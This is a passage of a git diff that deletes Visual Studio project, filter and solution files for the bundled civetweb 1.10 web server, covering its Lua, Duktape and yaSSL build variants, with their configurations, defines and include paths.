-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug CONSOLE|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_SERVER_STATS;USE_DUKTAPE;USE_IPV6;LUA_COMPAT_ALL;USE_LUA;USE_LUA_SQLITE3;USE_LUA_FILE_SYSTEM;USE_WEBSOCKET;WIN32;_DEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;$(ProjectDir)..\..\src\third_party\duktape-1.5.2\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_SERVER_STATS;USE_DUKTAPE;USE_IPV6;LUA_COMPAT_ALL;USE_LUA;USE_LUA_SQLITE3;USE_LUA_FILE_SYSTEM;USE_WEBSOCKET;WIN32;_DEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;$(ProjectDir)..\..\src\third_party\duktape-1.5.2\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug CONSOLE|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>LUA_COMPAT_ALL;USE_LUA;USE_LUA_SQLITE3;USE_LUA_FILE_SYSTEM;USE_WEBSOCKET;WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_SERVER_STATS;USE_DUKTAPE;USE_IPV6;LUA_COMPAT_ALL;USE_LUA;USE_LUA_SQLITE3;USE_LUA_FILE_SYSTEM;USE_WEBSOCKET;WIN32;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;$(ProjectDir)..\..\src\third_party\duktape-1.5.2\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_SERVER_STATS;USE_DUKTAPE;USE_IPV6;LUA_COMPAT_ALL;USE_LUA;USE_LUA_SQLITE3;USE_LUA_FILE_SYSTEM;USE_WEBSOCKET;WIN32;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;$(ProjectDir)..\..\src\third_party\duktape-1.5.2\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <Text Include="ReadMe.txt" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h" />

-    <ClInclude Include="..\..\src\third_party\civetweb_lua.h" />

-    <ClInclude Include="..\..\src\third_party\lua-5.2.4\src\lauxlib.h" />

-    <ClInclude Include="..\..\src\third_party\lua-5.2.4\src\lua.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c" />

-    <ClCompile Include="..\..\src\main.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ResourceCompile Include="..\..\resources\res.rc" />

-  </ItemGroup>

-  <ItemGroup>

-    <Image Include="..\..\resources\systray.ico" />

-  </ItemGroup>

-  <ItemGroup>

-    <ProjectReference Include="..\lua_lib\lua_lib.vcxproj">

-      <Project>{8f5e5d77-d269-4665-9e27-1045da6cf0d8}</Project>

-    </ProjectReference>

-    <ProjectReference Include="..\duktape_lib\duktape_lib.vcxproj">

-      <Project>{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}</Project>

-    </ProjectReference>

-  </ItemGroup>

-  <ItemGroup>

-    <None Include="..\..\src\handle_form.inl" />

-    <None Include="..\..\src\md5.inl" />

-    <None Include="..\..\src\sha1.inl" />

-    <None Include="..\..\src\mod_duktape.inl" />

-    <None Include="..\..\src\mod_lua.inl" />

-    <None Include="..\..\src\timer.inl" />

-    <None Include="..\..\src\file_ops.inl" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_lua/civetweb_lua.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/civetweb_lua/civetweb_lua.vcxproj.filters
deleted file mode 100644
index caf951c..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_lua/civetweb_lua.vcxproj.filters
+++ /dev/null
@@ -1,78 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-    <Filter Include="inl files">

-      <UniqueIdentifier>{1ef3413b-2315-48f2-ad22-57af6b4f7aca}</UniqueIdentifier>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <Text Include="ReadMe.txt" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\src\third_party\lua-5.2.4\src\lua.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\src\third_party\lua-5.2.4\src\lauxlib.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\src\third_party\civetweb_lua.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\main.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <ResourceCompile Include="..\..\resources\res.rc">

-      <Filter>Resource Files</Filter>

-    </ResourceCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <Image Include="..\..\resources\systray.ico">

-      <Filter>Resource Files</Filter>

-    </Image>

-  </ItemGroup>

-  <ItemGroup>

-    <None Include="..\..\src\md5.inl">

-      <Filter>inl files</Filter>

-    </None>

-    <None Include="..\..\src\sha1.inl">

-      <Filter>inl files</Filter>

-    </None>

-    <None Include="..\..\src\mod_lua.inl">

-      <Filter>inl files</Filter>

-    </None>

-    <None Include="..\..\src\timer.inl">

-      <Filter>inl files</Filter>

-    </None>

-    <None Include="..\..\src\file_ops.inl">

-      <Filter>inl files</Filter>

-    </None>

-    <None Include="..\..\src\mod_duktape.inl">

-      <Filter>inl files</Filter>

-    </None>

-    <None Include="..\..\src\handle_form.inl">

-      <Filter>inl files</Filter>

-    </None>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl.sln b/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl.sln
deleted file mode 100644
index 49e36ce..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl.sln
+++ /dev/null
@@ -1,36 +0,0 @@
-

-Microsoft Visual Studio Solution File, Format Version 12.00

-# Visual Studio 2012

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "civetweb_yassl", "civetweb_yassl\civetweb_yassl.vcxproj", "{F02517CC-F896-41A2-86E4-509E55C70059}"

-EndProject

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "yassl_lib", "yassl_lib\yassl_lib.vcxproj", "{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}"

-EndProject

-Global

-	GlobalSection(SolutionConfigurationPlatforms) = preSolution

-		Debug|Win32 = Debug|Win32

-		Debug|x64 = Debug|x64

-		Release|Win32 = Release|Win32

-		Release|x64 = Release|x64

-	EndGlobalSection

-	GlobalSection(ProjectConfigurationPlatforms) = postSolution

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Debug|Win32.ActiveCfg = Debug|Win32

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Debug|Win32.Build.0 = Debug|Win32

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Debug|x64.ActiveCfg = Debug|x64

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Debug|x64.Build.0 = Debug|x64

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Release|Win32.ActiveCfg = Release|Win32

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Release|Win32.Build.0 = Release|Win32

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Release|x64.ActiveCfg = Release|x64

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Release|x64.Build.0 = Release|x64

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Debug|Win32.ActiveCfg = Debug|Win32

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Debug|Win32.Build.0 = Debug|Win32

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Debug|x64.ActiveCfg = Debug|x64

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Debug|x64.Build.0 = Debug|x64

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Release|Win32.ActiveCfg = Release|Win32

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Release|Win32.Build.0 = Release|Win32

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Release|x64.ActiveCfg = Release|x64

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Release|x64.Build.0 = Release|x64

-	EndGlobalSection

-	GlobalSection(SolutionProperties) = preSolution

-		HideSolutionNode = FALSE

-	EndGlobalSection

-EndGlobal

diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl/civetweb_yassl.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl/civetweb_yassl.vcxproj
deleted file mode 100644
index b9a048e..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl/civetweb_yassl.vcxproj
+++ /dev/null
@@ -1,170 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{F02517CC-F896-41A2-86E4-509E55C70059}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>civetweb_yassl</RootNamespace>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_YASSL;NO_SSL_DL;WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\include;$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_YASSL;NO_SSL_DL;WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\include;$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_YASSL;NO_SSL_DL;WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\include;$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_YASSL;NO_SSL_DL;WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\include;$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\..\include\civetweb.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\..\src\civetweb.c" />

-    <ClCompile Include="..\..\..\src\main.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ResourceCompile Include="..\..\..\resources\res.rc" />

-  </ItemGroup>

-  <ItemGroup>

-    <Image Include="..\..\..\resources\systray.ico" />

-  </ItemGroup>

-  <ItemGroup>

-    <ProjectReference Include="..\yassl_lib\yassl_lib.vcxproj">

-      <Project>{8c0c878b-bbd6-4241-bca6-61753ffcc7f1}</Project>

-    </ProjectReference>

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl/civetweb_yassl.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl/civetweb_yassl.vcxproj.filters
deleted file mode 100644
index 1c5ee40..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl/civetweb_yassl.vcxproj.filters
+++ /dev/null
@@ -1,40 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\src\main.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <ResourceCompile Include="..\..\..\resources\res.rc">

-      <Filter>Resource Files</Filter>

-    </ResourceCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <Image Include="..\..\..\resources\systray.ico">

-      <Filter>Resource Files</Filter>

-    </Image>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/yassl_lib/yassl_lib.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/yassl_lib/yassl_lib.vcxproj
deleted file mode 100644
index 033b82d..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/yassl_lib/yassl_lib.vcxproj
+++ /dev/null
@@ -1,185 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>yassl_lib</RootNamespace>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

